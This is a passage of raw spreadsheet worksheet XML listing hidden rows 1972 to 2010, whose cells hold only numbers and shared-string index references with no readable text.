      <c r="H1972">
        <v>4624</v>
      </c>
      <c r="I1972">
        <v>948</v>
      </c>
      <c r="K1972" t="s">
        <v>63</v>
      </c>
      <c r="L1972" t="s">
        <v>64</v>
      </c>
      <c r="T1972">
        <v>3</v>
      </c>
      <c r="U1972">
        <v>60106</v>
      </c>
      <c r="V1972" t="s">
        <v>65</v>
      </c>
      <c r="W1972" t="s">
        <v>33</v>
      </c>
      <c r="X1972" t="s">
        <v>34</v>
      </c>
      <c r="Y1972" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="1973" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1973">
        <v>1972</v>
      </c>
      <c r="B1973" t="s">
        <v>25</v>
      </c>
      <c r="C1973" t="s">
        <v>2392</v>
      </c>
      <c r="D1973">
        <v>16</v>
      </c>
      <c r="E1973" t="s">
        <v>605</v>
      </c>
      <c r="F1973" t="s">
        <v>606</v>
      </c>
      <c r="G1973" t="s">
        <v>50</v>
      </c>
      <c r="H1973">
        <v>4688</v>
      </c>
      <c r="I1973">
        <v>4</v>
      </c>
      <c r="R1973" t="s">
        <v>57</v>
      </c>
      <c r="T1973">
        <v>3</v>
      </c>
      <c r="U1973">
        <v>67027</v>
      </c>
      <c r="V1973" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1974" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1974">
        <v>1973</v>
      </c>
      <c r="B1974" t="s">
        <v>25</v>
      </c>
      <c r="C1974" t="s">
        <v>2393</v>
      </c>
      <c r="D1974">
        <v>16</v>
      </c>
      <c r="E1974" t="s">
        <v>605</v>
      </c>
      <c r="F1974" t="s">
        <v>606</v>
      </c>
      <c r="G1974" t="s">
        <v>50</v>
      </c>
      <c r="H1974">
        <v>4688</v>
      </c>
      <c r="I1974">
        <v>4</v>
      </c>
      <c r="R1974" t="s">
        <v>281</v>
      </c>
      <c r="T1974">
        <v>3</v>
      </c>
      <c r="U1974">
        <v>67027</v>
      </c>
      <c r="V1974" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1975" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1975">
        <v>1974</v>
      </c>
      <c r="B1975" t="s">
        <v>25</v>
      </c>
      <c r="C1975" t="s">
        <v>2394</v>
      </c>
      <c r="D1975">
        <v>16</v>
      </c>
      <c r="E1975" t="s">
        <v>605</v>
      </c>
      <c r="F1975" t="s">
        <v>606</v>
      </c>
      <c r="G1975" t="s">
        <v>50</v>
      </c>
      <c r="H1975">
        <v>4688</v>
      </c>
      <c r="I1975">
        <v>4</v>
      </c>
      <c r="R1975" t="s">
        <v>203</v>
      </c>
      <c r="T1975">
        <v>3</v>
      </c>
      <c r="U1975">
        <v>67027</v>
      </c>
      <c r="V1975" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1976" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1976">
        <v>1975</v>
      </c>
      <c r="B1976" t="s">
        <v>25</v>
      </c>
      <c r="C1976" t="s">
        <v>2395</v>
      </c>
      <c r="D1976">
        <v>16</v>
      </c>
      <c r="E1976" t="s">
        <v>605</v>
      </c>
      <c r="F1976" t="s">
        <v>606</v>
      </c>
      <c r="G1976" t="s">
        <v>50</v>
      </c>
      <c r="H1976">
        <v>4688</v>
      </c>
      <c r="I1976">
        <v>4</v>
      </c>
      <c r="R1976" t="s">
        <v>57</v>
      </c>
      <c r="T1976">
        <v>3</v>
      </c>
      <c r="U1976">
        <v>67027</v>
      </c>
      <c r="V1976" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1977" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1977">
        <v>1976</v>
      </c>
      <c r="B1977" t="s">
        <v>25</v>
      </c>
      <c r="C1977" t="s">
        <v>2396</v>
      </c>
      <c r="D1977">
        <v>16</v>
      </c>
      <c r="E1977" t="s">
        <v>605</v>
      </c>
      <c r="F1977" t="s">
        <v>606</v>
      </c>
      <c r="G1977" t="s">
        <v>50</v>
      </c>
      <c r="H1977">
        <v>4688</v>
      </c>
      <c r="I1977">
        <v>4</v>
      </c>
      <c r="R1977" t="s">
        <v>857</v>
      </c>
      <c r="T1977">
        <v>3</v>
      </c>
      <c r="U1977">
        <v>67027</v>
      </c>
      <c r="V1977" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1978" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1978">
        <v>1977</v>
      </c>
      <c r="B1978" t="s">
        <v>25</v>
      </c>
      <c r="C1978" t="s">
        <v>2397</v>
      </c>
      <c r="D1978">
        <v>16</v>
      </c>
      <c r="E1978" t="s">
        <v>605</v>
      </c>
      <c r="F1978" t="s">
        <v>606</v>
      </c>
      <c r="G1978" t="s">
        <v>50</v>
      </c>
      <c r="H1978">
        <v>4688</v>
      </c>
      <c r="I1978">
        <v>4</v>
      </c>
      <c r="R1978" t="s">
        <v>205</v>
      </c>
      <c r="T1978">
        <v>3</v>
      </c>
      <c r="U1978">
        <v>67027</v>
      </c>
      <c r="V1978" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1979" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1979">
        <v>1978</v>
      </c>
      <c r="B1979" t="s">
        <v>25</v>
      </c>
      <c r="C1979" t="s">
        <v>2398</v>
      </c>
      <c r="D1979">
        <v>16</v>
      </c>
      <c r="E1979" t="s">
        <v>605</v>
      </c>
      <c r="F1979" t="s">
        <v>606</v>
      </c>
      <c r="G1979" t="s">
        <v>50</v>
      </c>
      <c r="H1979">
        <v>4688</v>
      </c>
      <c r="I1979">
        <v>4</v>
      </c>
      <c r="R1979" t="s">
        <v>57</v>
      </c>
      <c r="T1979">
        <v>3</v>
      </c>
      <c r="U1979">
        <v>67027</v>
      </c>
      <c r="V1979" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1980" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1980">
        <v>1979</v>
      </c>
      <c r="B1980" t="s">
        <v>25</v>
      </c>
      <c r="C1980" t="s">
        <v>2399</v>
      </c>
      <c r="D1980">
        <v>16</v>
      </c>
      <c r="E1980" t="s">
        <v>605</v>
      </c>
      <c r="F1980" t="s">
        <v>606</v>
      </c>
      <c r="G1980" t="s">
        <v>50</v>
      </c>
      <c r="H1980">
        <v>4688</v>
      </c>
      <c r="I1980">
        <v>4</v>
      </c>
      <c r="R1980" t="s">
        <v>208</v>
      </c>
      <c r="T1980">
        <v>3</v>
      </c>
      <c r="U1980">
        <v>67027</v>
      </c>
      <c r="V1980" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1981" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1981">
        <v>1980</v>
      </c>
      <c r="B1981" t="s">
        <v>25</v>
      </c>
      <c r="C1981" t="s">
        <v>2400</v>
      </c>
      <c r="D1981">
        <v>16</v>
      </c>
      <c r="E1981" t="s">
        <v>605</v>
      </c>
      <c r="F1981" t="s">
        <v>606</v>
      </c>
      <c r="G1981" t="s">
        <v>50</v>
      </c>
      <c r="H1981">
        <v>4688</v>
      </c>
      <c r="I1981">
        <v>4</v>
      </c>
      <c r="R1981" t="s">
        <v>57</v>
      </c>
      <c r="T1981">
        <v>3</v>
      </c>
      <c r="U1981">
        <v>67027</v>
      </c>
      <c r="V1981" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1982" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1982">
        <v>1981</v>
      </c>
      <c r="B1982" t="s">
        <v>25</v>
      </c>
      <c r="C1982" t="s">
        <v>2401</v>
      </c>
      <c r="D1982">
        <v>16</v>
      </c>
      <c r="E1982" t="s">
        <v>605</v>
      </c>
      <c r="F1982" t="s">
        <v>606</v>
      </c>
      <c r="G1982" t="s">
        <v>50</v>
      </c>
      <c r="H1982">
        <v>4688</v>
      </c>
      <c r="I1982">
        <v>4</v>
      </c>
      <c r="R1982" t="s">
        <v>210</v>
      </c>
      <c r="T1982">
        <v>3</v>
      </c>
      <c r="U1982">
        <v>67027</v>
      </c>
      <c r="V1982" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1983" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1983">
        <v>1982</v>
      </c>
      <c r="B1983" t="s">
        <v>25</v>
      </c>
      <c r="C1983" t="s">
        <v>2402</v>
      </c>
      <c r="D1983">
        <v>16</v>
      </c>
      <c r="E1983" t="s">
        <v>605</v>
      </c>
      <c r="F1983" t="s">
        <v>606</v>
      </c>
      <c r="G1983" t="s">
        <v>50</v>
      </c>
      <c r="H1983">
        <v>4688</v>
      </c>
      <c r="I1983">
        <v>4</v>
      </c>
      <c r="R1983" t="s">
        <v>57</v>
      </c>
      <c r="T1983">
        <v>3</v>
      </c>
      <c r="U1983">
        <v>67027</v>
      </c>
      <c r="V1983" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1984" spans="1:25" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1984">
        <v>1983</v>
      </c>
      <c r="B1984" t="s">
        <v>25</v>
      </c>
      <c r="C1984" t="s">
        <v>2403</v>
      </c>
      <c r="D1984">
        <v>16</v>
      </c>
      <c r="E1984" t="s">
        <v>605</v>
      </c>
      <c r="F1984" t="s">
        <v>606</v>
      </c>
      <c r="G1984" t="s">
        <v>50</v>
      </c>
      <c r="H1984">
        <v>4688</v>
      </c>
      <c r="I1984">
        <v>4</v>
      </c>
      <c r="R1984" t="s">
        <v>213</v>
      </c>
      <c r="T1984">
        <v>3</v>
      </c>
      <c r="U1984">
        <v>67027</v>
      </c>
      <c r="V1984" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1985" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1985">
        <v>1984</v>
      </c>
      <c r="B1985" t="s">
        <v>25</v>
      </c>
      <c r="C1985" t="s">
        <v>2404</v>
      </c>
      <c r="D1985">
        <v>16</v>
      </c>
      <c r="E1985" t="s">
        <v>605</v>
      </c>
      <c r="F1985" t="s">
        <v>606</v>
      </c>
      <c r="G1985" t="s">
        <v>50</v>
      </c>
      <c r="H1985">
        <v>4688</v>
      </c>
      <c r="I1985">
        <v>4</v>
      </c>
      <c r="R1985" t="s">
        <v>57</v>
      </c>
      <c r="T1985">
        <v>3</v>
      </c>
      <c r="U1985">
        <v>67027</v>
      </c>
      <c r="V1985" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1986" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1986">
        <v>1985</v>
      </c>
      <c r="B1986" t="s">
        <v>25</v>
      </c>
      <c r="C1986" t="s">
        <v>2405</v>
      </c>
      <c r="D1986">
        <v>16</v>
      </c>
      <c r="E1986" t="s">
        <v>605</v>
      </c>
      <c r="F1986" t="s">
        <v>606</v>
      </c>
      <c r="G1986" t="s">
        <v>50</v>
      </c>
      <c r="H1986">
        <v>4688</v>
      </c>
      <c r="I1986">
        <v>4</v>
      </c>
      <c r="R1986" t="s">
        <v>216</v>
      </c>
      <c r="T1986">
        <v>3</v>
      </c>
      <c r="U1986">
        <v>67027</v>
      </c>
      <c r="V1986" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1987" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1987">
        <v>1986</v>
      </c>
      <c r="B1987" t="s">
        <v>25</v>
      </c>
      <c r="C1987" t="s">
        <v>2406</v>
      </c>
      <c r="D1987">
        <v>16</v>
      </c>
      <c r="E1987" t="s">
        <v>605</v>
      </c>
      <c r="F1987" t="s">
        <v>606</v>
      </c>
      <c r="G1987" t="s">
        <v>50</v>
      </c>
      <c r="H1987">
        <v>4688</v>
      </c>
      <c r="I1987">
        <v>4</v>
      </c>
      <c r="R1987" t="s">
        <v>57</v>
      </c>
      <c r="T1987">
        <v>3</v>
      </c>
      <c r="U1987">
        <v>67027</v>
      </c>
      <c r="V1987" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1988" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1988">
        <v>1987</v>
      </c>
      <c r="B1988" t="s">
        <v>25</v>
      </c>
      <c r="C1988" t="s">
        <v>2407</v>
      </c>
      <c r="D1988">
        <v>16</v>
      </c>
      <c r="E1988" t="s">
        <v>605</v>
      </c>
      <c r="F1988" t="s">
        <v>606</v>
      </c>
      <c r="G1988" t="s">
        <v>50</v>
      </c>
      <c r="H1988">
        <v>4688</v>
      </c>
      <c r="I1988">
        <v>4</v>
      </c>
      <c r="R1988" t="s">
        <v>219</v>
      </c>
      <c r="T1988">
        <v>3</v>
      </c>
      <c r="U1988">
        <v>67027</v>
      </c>
      <c r="V1988" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1989" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1989">
        <v>1988</v>
      </c>
      <c r="B1989" t="s">
        <v>25</v>
      </c>
      <c r="C1989" t="s">
        <v>2408</v>
      </c>
      <c r="D1989">
        <v>16</v>
      </c>
      <c r="E1989" t="s">
        <v>605</v>
      </c>
      <c r="F1989" t="s">
        <v>606</v>
      </c>
      <c r="G1989" t="s">
        <v>50</v>
      </c>
      <c r="H1989">
        <v>4688</v>
      </c>
      <c r="I1989">
        <v>4</v>
      </c>
      <c r="R1989" t="s">
        <v>57</v>
      </c>
      <c r="T1989">
        <v>3</v>
      </c>
      <c r="U1989">
        <v>67027</v>
      </c>
      <c r="V1989" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1990" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1990">
        <v>1989</v>
      </c>
      <c r="B1990" t="s">
        <v>25</v>
      </c>
      <c r="C1990" t="s">
        <v>2408</v>
      </c>
      <c r="D1990">
        <v>16</v>
      </c>
      <c r="E1990" t="s">
        <v>605</v>
      </c>
      <c r="F1990" t="s">
        <v>606</v>
      </c>
      <c r="G1990" t="s">
        <v>50</v>
      </c>
      <c r="H1990">
        <v>4688</v>
      </c>
      <c r="I1990">
        <v>4</v>
      </c>
      <c r="R1990" t="s">
        <v>57</v>
      </c>
      <c r="T1990">
        <v>3</v>
      </c>
      <c r="U1990">
        <v>67027</v>
      </c>
      <c r="V1990" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1991" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1991">
        <v>1990</v>
      </c>
      <c r="B1991" t="s">
        <v>25</v>
      </c>
      <c r="C1991" t="s">
        <v>2409</v>
      </c>
      <c r="D1991">
        <v>16</v>
      </c>
      <c r="E1991" t="s">
        <v>605</v>
      </c>
      <c r="F1991" t="s">
        <v>606</v>
      </c>
      <c r="G1991" t="s">
        <v>50</v>
      </c>
      <c r="H1991">
        <v>4688</v>
      </c>
      <c r="I1991">
        <v>4</v>
      </c>
      <c r="R1991" t="s">
        <v>222</v>
      </c>
      <c r="T1991">
        <v>3</v>
      </c>
      <c r="U1991">
        <v>67027</v>
      </c>
      <c r="V1991" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1992" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1992">
        <v>1991</v>
      </c>
      <c r="B1992" t="s">
        <v>25</v>
      </c>
      <c r="C1992" t="s">
        <v>2410</v>
      </c>
      <c r="D1992">
        <v>16</v>
      </c>
      <c r="E1992" t="s">
        <v>605</v>
      </c>
      <c r="F1992" t="s">
        <v>606</v>
      </c>
      <c r="G1992" t="s">
        <v>122</v>
      </c>
      <c r="H1992">
        <v>5007</v>
      </c>
      <c r="I1992">
        <v>3912</v>
      </c>
      <c r="T1992">
        <v>5</v>
      </c>
      <c r="U1992">
        <v>62154</v>
      </c>
      <c r="V1992" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="1993" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1993">
        <v>1992</v>
      </c>
      <c r="B1993" t="s">
        <v>25</v>
      </c>
      <c r="C1993" t="s">
        <v>2411</v>
      </c>
      <c r="D1993">
        <v>16</v>
      </c>
      <c r="E1993" t="s">
        <v>605</v>
      </c>
      <c r="F1993" t="s">
        <v>606</v>
      </c>
      <c r="G1993" t="s">
        <v>262</v>
      </c>
      <c r="H1993">
        <v>1003</v>
      </c>
      <c r="I1993">
        <v>6716</v>
      </c>
      <c r="T1993">
        <v>3</v>
      </c>
      <c r="U1993">
        <v>60668</v>
      </c>
      <c r="V1993" t="s">
        <v>415</v>
      </c>
    </row>
    <row r="1994" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1994">
        <v>1993</v>
      </c>
      <c r="B1994" t="s">
        <v>25</v>
      </c>
      <c r="C1994" t="s">
        <v>2412</v>
      </c>
      <c r="D1994">
        <v>16</v>
      </c>
      <c r="E1994" t="s">
        <v>605</v>
      </c>
      <c r="F1994" t="s">
        <v>606</v>
      </c>
      <c r="G1994" t="s">
        <v>50</v>
      </c>
      <c r="H1994">
        <v>4688</v>
      </c>
      <c r="I1994">
        <v>4</v>
      </c>
      <c r="R1994" t="s">
        <v>225</v>
      </c>
      <c r="T1994">
        <v>3</v>
      </c>
      <c r="U1994">
        <v>67027</v>
      </c>
      <c r="V1994" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1995" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1995">
        <v>1994</v>
      </c>
      <c r="B1995" t="s">
        <v>25</v>
      </c>
      <c r="C1995" t="s">
        <v>2413</v>
      </c>
      <c r="D1995">
        <v>16</v>
      </c>
      <c r="E1995" t="s">
        <v>605</v>
      </c>
      <c r="F1995" t="s">
        <v>606</v>
      </c>
      <c r="G1995" t="s">
        <v>50</v>
      </c>
      <c r="H1995">
        <v>4688</v>
      </c>
      <c r="I1995">
        <v>4</v>
      </c>
      <c r="R1995" t="s">
        <v>57</v>
      </c>
      <c r="T1995">
        <v>3</v>
      </c>
      <c r="U1995">
        <v>67027</v>
      </c>
      <c r="V1995" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1996" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1996">
        <v>1995</v>
      </c>
      <c r="B1996" t="s">
        <v>25</v>
      </c>
      <c r="C1996" t="s">
        <v>2414</v>
      </c>
      <c r="D1996">
        <v>16</v>
      </c>
      <c r="E1996" t="s">
        <v>605</v>
      </c>
      <c r="F1996" t="s">
        <v>606</v>
      </c>
      <c r="G1996" t="s">
        <v>50</v>
      </c>
      <c r="H1996">
        <v>4688</v>
      </c>
      <c r="I1996">
        <v>4</v>
      </c>
      <c r="R1996" t="s">
        <v>227</v>
      </c>
      <c r="T1996">
        <v>3</v>
      </c>
      <c r="U1996">
        <v>67027</v>
      </c>
      <c r="V1996" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1997" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1997">
        <v>1996</v>
      </c>
      <c r="B1997" t="s">
        <v>25</v>
      </c>
      <c r="C1997" t="s">
        <v>2415</v>
      </c>
      <c r="D1997">
        <v>16</v>
      </c>
      <c r="E1997" t="s">
        <v>605</v>
      </c>
      <c r="F1997" t="s">
        <v>606</v>
      </c>
      <c r="G1997" t="s">
        <v>50</v>
      </c>
      <c r="H1997">
        <v>4688</v>
      </c>
      <c r="I1997">
        <v>4</v>
      </c>
      <c r="R1997" t="s">
        <v>57</v>
      </c>
      <c r="T1997">
        <v>3</v>
      </c>
      <c r="U1997">
        <v>67027</v>
      </c>
      <c r="V1997" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1998" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1998">
        <v>1997</v>
      </c>
      <c r="B1998" t="s">
        <v>25</v>
      </c>
      <c r="C1998" t="s">
        <v>2416</v>
      </c>
      <c r="D1998">
        <v>16</v>
      </c>
      <c r="E1998" t="s">
        <v>605</v>
      </c>
      <c r="F1998" t="s">
        <v>606</v>
      </c>
      <c r="G1998" t="s">
        <v>50</v>
      </c>
      <c r="H1998">
        <v>4688</v>
      </c>
      <c r="I1998">
        <v>4</v>
      </c>
      <c r="R1998" t="s">
        <v>230</v>
      </c>
      <c r="T1998">
        <v>3</v>
      </c>
      <c r="U1998">
        <v>67027</v>
      </c>
      <c r="V1998" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="1999" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A1999">
        <v>1998</v>
      </c>
      <c r="B1999" t="s">
        <v>25</v>
      </c>
      <c r="C1999" t="s">
        <v>2417</v>
      </c>
      <c r="D1999">
        <v>16</v>
      </c>
      <c r="E1999" t="s">
        <v>605</v>
      </c>
      <c r="F1999" t="s">
        <v>606</v>
      </c>
      <c r="G1999" t="s">
        <v>50</v>
      </c>
      <c r="H1999">
        <v>4688</v>
      </c>
      <c r="I1999">
        <v>4</v>
      </c>
      <c r="R1999" t="s">
        <v>57</v>
      </c>
      <c r="T1999">
        <v>3</v>
      </c>
      <c r="U1999">
        <v>67027</v>
      </c>
      <c r="V1999" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2000" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2000">
        <v>1999</v>
      </c>
      <c r="B2000" t="s">
        <v>25</v>
      </c>
      <c r="C2000" t="s">
        <v>2418</v>
      </c>
      <c r="D2000">
        <v>16</v>
      </c>
      <c r="E2000" t="s">
        <v>605</v>
      </c>
      <c r="F2000" t="s">
        <v>606</v>
      </c>
      <c r="G2000" t="s">
        <v>50</v>
      </c>
      <c r="H2000">
        <v>4688</v>
      </c>
      <c r="I2000">
        <v>4</v>
      </c>
      <c r="R2000" t="s">
        <v>233</v>
      </c>
      <c r="T2000">
        <v>3</v>
      </c>
      <c r="U2000">
        <v>67027</v>
      </c>
      <c r="V2000" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2001" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2001">
        <v>2000</v>
      </c>
      <c r="B2001" t="s">
        <v>25</v>
      </c>
      <c r="C2001" t="s">
        <v>2419</v>
      </c>
      <c r="D2001">
        <v>16</v>
      </c>
      <c r="E2001" t="s">
        <v>605</v>
      </c>
      <c r="F2001" t="s">
        <v>606</v>
      </c>
      <c r="G2001" t="s">
        <v>50</v>
      </c>
      <c r="H2001">
        <v>4688</v>
      </c>
      <c r="I2001">
        <v>4</v>
      </c>
      <c r="R2001" t="s">
        <v>57</v>
      </c>
      <c r="T2001">
        <v>3</v>
      </c>
      <c r="U2001">
        <v>67027</v>
      </c>
      <c r="V2001" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2002" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2002">
        <v>2001</v>
      </c>
      <c r="B2002" t="s">
        <v>25</v>
      </c>
      <c r="C2002" t="s">
        <v>2420</v>
      </c>
      <c r="D2002">
        <v>16</v>
      </c>
      <c r="E2002" t="s">
        <v>605</v>
      </c>
      <c r="F2002" t="s">
        <v>606</v>
      </c>
      <c r="G2002" t="s">
        <v>50</v>
      </c>
      <c r="H2002">
        <v>4688</v>
      </c>
      <c r="I2002">
        <v>4</v>
      </c>
      <c r="R2002" t="s">
        <v>236</v>
      </c>
      <c r="T2002">
        <v>3</v>
      </c>
      <c r="U2002">
        <v>67027</v>
      </c>
      <c r="V2002" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2003" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2003">
        <v>2002</v>
      </c>
      <c r="B2003" t="s">
        <v>25</v>
      </c>
      <c r="C2003" t="s">
        <v>2421</v>
      </c>
      <c r="D2003">
        <v>16</v>
      </c>
      <c r="E2003" t="s">
        <v>605</v>
      </c>
      <c r="F2003" t="s">
        <v>606</v>
      </c>
      <c r="G2003" t="s">
        <v>50</v>
      </c>
      <c r="H2003">
        <v>4688</v>
      </c>
      <c r="I2003">
        <v>4</v>
      </c>
      <c r="R2003" t="s">
        <v>57</v>
      </c>
      <c r="T2003">
        <v>3</v>
      </c>
      <c r="U2003">
        <v>67027</v>
      </c>
      <c r="V2003" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2004" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2004">
        <v>2003</v>
      </c>
      <c r="B2004" t="s">
        <v>25</v>
      </c>
      <c r="C2004" t="s">
        <v>2422</v>
      </c>
      <c r="D2004">
        <v>16</v>
      </c>
      <c r="E2004" t="s">
        <v>605</v>
      </c>
      <c r="F2004" t="s">
        <v>606</v>
      </c>
      <c r="G2004" t="s">
        <v>50</v>
      </c>
      <c r="H2004">
        <v>4688</v>
      </c>
      <c r="I2004">
        <v>4</v>
      </c>
      <c r="R2004" t="s">
        <v>92</v>
      </c>
      <c r="T2004">
        <v>3</v>
      </c>
      <c r="U2004">
        <v>67027</v>
      </c>
      <c r="V2004" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2005" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2005">
        <v>2004</v>
      </c>
      <c r="B2005" t="s">
        <v>25</v>
      </c>
      <c r="C2005" t="s">
        <v>2423</v>
      </c>
      <c r="D2005">
        <v>16</v>
      </c>
      <c r="E2005" t="s">
        <v>605</v>
      </c>
      <c r="F2005" t="s">
        <v>606</v>
      </c>
      <c r="G2005" t="s">
        <v>50</v>
      </c>
      <c r="H2005">
        <v>4688</v>
      </c>
      <c r="I2005">
        <v>4</v>
      </c>
      <c r="R2005" t="s">
        <v>238</v>
      </c>
      <c r="T2005">
        <v>3</v>
      </c>
      <c r="U2005">
        <v>67027</v>
      </c>
      <c r="V2005" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2006" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2006">
        <v>2005</v>
      </c>
      <c r="B2006" t="s">
        <v>25</v>
      </c>
      <c r="C2006" t="s">
        <v>2424</v>
      </c>
      <c r="D2006">
        <v>16</v>
      </c>
      <c r="E2006" t="s">
        <v>605</v>
      </c>
      <c r="F2006" t="s">
        <v>606</v>
      </c>
      <c r="G2006" t="s">
        <v>50</v>
      </c>
      <c r="H2006">
        <v>4688</v>
      </c>
      <c r="I2006">
        <v>4</v>
      </c>
      <c r="R2006" t="s">
        <v>57</v>
      </c>
      <c r="T2006">
        <v>3</v>
      </c>
      <c r="U2006">
        <v>67027</v>
      </c>
      <c r="V2006" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2007" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2007">
        <v>2006</v>
      </c>
      <c r="B2007" t="s">
        <v>25</v>
      </c>
      <c r="C2007" t="s">
        <v>2425</v>
      </c>
      <c r="D2007">
        <v>16</v>
      </c>
      <c r="E2007" t="s">
        <v>605</v>
      </c>
      <c r="F2007" t="s">
        <v>606</v>
      </c>
      <c r="G2007" t="s">
        <v>50</v>
      </c>
      <c r="H2007">
        <v>4688</v>
      </c>
      <c r="I2007">
        <v>4</v>
      </c>
      <c r="R2007" t="s">
        <v>241</v>
      </c>
      <c r="T2007">
        <v>3</v>
      </c>
      <c r="U2007">
        <v>67027</v>
      </c>
      <c r="V2007" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2008" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2008">
        <v>2007</v>
      </c>
      <c r="B2008" t="s">
        <v>25</v>
      </c>
      <c r="C2008" t="s">
        <v>2426</v>
      </c>
      <c r="D2008">
        <v>16</v>
      </c>
      <c r="E2008" t="s">
        <v>605</v>
      </c>
      <c r="F2008" t="s">
        <v>606</v>
      </c>
      <c r="G2008" t="s">
        <v>50</v>
      </c>
      <c r="H2008">
        <v>4688</v>
      </c>
      <c r="I2008">
        <v>4</v>
      </c>
      <c r="R2008" t="s">
        <v>244</v>
      </c>
      <c r="T2008">
        <v>3</v>
      </c>
      <c r="U2008">
        <v>67027</v>
      </c>
      <c r="V2008" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2009" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2009">
        <v>2008</v>
      </c>
      <c r="B2009" t="s">
        <v>25</v>
      </c>
      <c r="C2009" t="s">
        <v>2426</v>
      </c>
      <c r="D2009">
        <v>16</v>
      </c>
      <c r="E2009" t="s">
        <v>605</v>
      </c>
      <c r="F2009" t="s">
        <v>606</v>
      </c>
      <c r="G2009" t="s">
        <v>50</v>
      </c>
      <c r="H2009">
        <v>4688</v>
      </c>
      <c r="I2009">
        <v>4</v>
      </c>
      <c r="R2009" t="s">
        <v>57</v>
      </c>
      <c r="T2009">
        <v>3</v>
      </c>
      <c r="U2009">
        <v>67027</v>
      </c>
      <c r="V2009" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2010" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2010">
        <v>2009</v>
      </c>
      <c r="B2010" t="s">
        <v>25</v>
      </c>
      <c r="C2010" t="s">
        <v>2427</v>
      </c>
      <c r="D2010">
        <v>16</v>
      </c>
      <c r="E2010" t="s">
        <v>605</v>
      </c>
      <c r="F2010" t="s">
        <v>606</v>
      </c>
      <c r="G2010" t="s">
        <v>50</v>
      </c>
      <c r="H2010">
        <v>4688</v>
      </c>
      <c r="I2010">
        <v>4</v>
      </c>
      <c r="R2010" t="s">
        <v>57</v>
      </c>
      <c r="T2010">
        <v>3</v>
      </c>
      <c r="U2010">
        <v>67027</v>
      </c>
      <c r="V2010" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="2011" spans="1:22" hidden="1" x14ac:dyDescent="0.35">
      <c r="A2011">
        <v>2010</v>
      </c>
      <c r="B2011" t="s">
        <v>25</v>
      </c>
      <c r="C2011" t="s">
        <v>2428</v>
